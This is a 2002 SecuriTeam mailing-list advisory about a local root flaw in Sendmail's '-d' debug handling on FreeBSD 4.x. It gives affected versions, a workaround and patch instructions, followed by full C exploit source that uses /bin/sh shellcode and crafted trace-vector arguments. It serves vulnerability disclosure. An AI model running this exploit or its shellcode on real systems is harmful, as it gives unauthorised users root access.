[EXPL] Exploit for Sendmail Local Root Vulnerability (FreeBSD, -d)

From: support@securiteam.com
Date: 12/20/02

  • Next message: support@securiteam.com: "[EXPL] Pfinger Exploit Code Released" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 20 Dec 2002 14:06:29 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Exploit for Sendmail Local Root Vulnerability (FreeBSD, -d)
    ------------------------------------------------------------------------

    SUMMARY

    Sendmail contains an input validation error which may lead to the
    execution of arbitrary code with elevated privileges by local users. Due
    to the improper use of signed integers in code responsible for the
    processing of debugging arguments, a local user may be able to supply the
    signed integer equivalent of a negative value supplied to Sendmail's
    "trace vector". This may allow a local user to write data anywhere within
    a certain range of locations in process memory. Because the '-d'
    command-line switch is processed before the program drops its elevated
    privileges, the attacker may be able to cause arbitrary code to be
    executed with root privileges.

    DETAILS

    Affects:
     * FreeBSD 4-STABLE after August 27, 2000 and prior to the correction
    date, FreeBSD 4.1.1-RELEASE, 4.2-RELEASE, 4.3-RELEASE

    Impact:
    Local users may be able to execute arbitrary code with root privileges.

    Workaround:
    Do not allow untrusted users to execute the sendmail binary.

    Solution:
    One of the following:

    1) Upgrade your vulnerable FreeBSD system to 4.3-STABLE or the RELENG_4_3
    security branch after the respective correction dates.

    2) FreeBSD 4.x systems after August 27, 2000 and prior to the correction
    date:

    The following patch has been verified to apply to FreeBSD 4.1.1-RELEASE,
    4.2-RELEASE, 4.3-RELEASE and 4-STABLE dated prior to the correction date.

    Download the patch and the detached PGP signature from the following
    locations, and verify the signature using your PGP utility.

    # fetch
    ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:57/sendmail.patch
    # fetch
    ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:57/sendmail.patch.asc

    Execute the following commands as root:

    # cd /usr/src
    # patch -p < /path/to/patch
    # cd /usr/src/lib/libsmutil
    # make depend && make all
    # cd /usr/src/usr.sbin/sendmail
    # make depend && make all install

    3) FreeBSD 4.3-RELEASE systems:

    An experimental upgrade package is available for users who wish to provide
    testing and feedback on the binary upgrade process. This package may be
    installed on FreeBSD 4.3-RELEASE systems only, and is intended for use on
    systems for which source patching is not practical or convenient.

    If you use the upgrade package, feedback (positive or negative) to
    security-officer@FreeBSD.org is requested so we can improve the process
    for future advisories.

    During the installation procedure, backup copies are made of the files
    which are replaced by the package. These backup copies will be reinstalled
    if the package is removed, reverting the system to a pre-patched state.

    # fetch
    ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:57/security-patch-sendmail-01.57.tgz
    # fetch
    ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:57/security-patch-sendmail-01.57.tgz.asc

    Verify the detached PGP signature using your PGP utility.

    # pkg_add security-patch-sendmail-01:57.tgz

    Restart sendmail after applying the patch by executing the following
    commands as root:

    # killall sendmail
    # /usr/sbin/sendmail -bd -q30m

    The flags to sendmail may need to be adjusted as required for the local
    system configuration.

    Correction details:
    The following is the sendmail $Id$ revision number of the file that was
    corrected for the supported branches of FreeBSD. The $Id$ revision number
    of the installed source can be examined using the ident(1) command.

      Revision Path
      8.20.22.4 src/contrib/sendmail/src/trace.c

    Exploit:
    /*
     * local r00t exploit for sendmail on *bsd*
     *
     * tested on: FreeBSD 4.3-RELEASE (sendmail version 8.11.3)
     *
     * writed by CrZ [crazy_einstein@yahoo.com] LimpidByte
     *
     * credits by Cade Cairnss:
    http://packetstormsecurity.org/advisories/freebsd/FreeBSD-SA-01:57.sendmail
     */
     
    #include <sys/param.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>

    #define NOPNUM 1024

    char shellcode[] =
    "\xeb\x16\x5e\x31\xc0\x8d\x0e\x89"
    "\x4e\x08\x89\x46\x0c\x8d\x4e\x08"
    "\x50\x51\x56\x50\xb0\x3b\xcd\x80"
    "\xe8\xe5\xff\xff\xff/bin/sh";

    int main(int argc, char *argv[])
    {
      char *egg, s[256], *av[3], *ev[2];

      egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5);
      if (egg == NULL) {
        perror("malloc()");
        exit(-1);
      }
      sprintf(egg, "EGG=");
      memset(egg + 4, 0x90, NOPNUM);
      sprintf(egg + 4 + NOPNUM, "%s", shellcode);

      
    sprintf(s,"-d4294900452-4294900452.196\n-d4294900453-4294900453.252\n-d4294900454-4294900454.191\n-d4294900455-4294900455.191");

      av[0] = "/usr/sbin/sendmail";
      av[1] = s;
      av[2] = NULL;
      ev[0] = egg;
      ev[1] = NULL;
      execve(*av, av, ev);

      return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:crazy_einstein@yahoo.com>
    CrZ and the FreeBSD security team.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages

    • RE: PAWS security vulnerability
      ... FreeBSD security list" isn't grammatically correct. ... "I told you to post the patch and info to the appropriate FreeBSD security ... "...This point and others are often discussed on the mailing lists, ...
      (freebsd-questions)
    • Re: Its COBOL, Jim, but not as we know it...
      ... ActiveX control has no more permissions on your system than a Java ... It is _you_ that has improved the security, ... MicroSoft system of signed authentication which is used by ActiveX controls. ... Microsoft email can automatically execute an attachment. ...
      (comp.lang.cobol)
    • [NEWS] DB2 on iSeries Stored Procedures Vulnerability
      ... Beyond Security would like to welcome Tiscali World Online ... This vulnerability lets an otherwise limited user execute iSeries ... This vulnerability lets a user execute REXX scripts. ... CL programs sources are kept in Source files. ...
      (Securiteam)
    • [Full-Disclosure] Flaws security feature of SP2
      ... Author: Jürgen Schmidt, heise Security ... Windows Explorer does not update zone information ... When a user tries to execute a file downloaded from the ... files from archives with a ZoneID greater than or equal ...
      (Full-Disclosure)
    • RE: [Full-Disclosure] Flaws security feature of SP2
      ... Flaws security feature of SP2 ... Windows Explorer does not update zone information ... When a user tries to execute a file downloaded from the ... files from archives with a ZoneID greater than or equal ...
      (Full-Disclosure)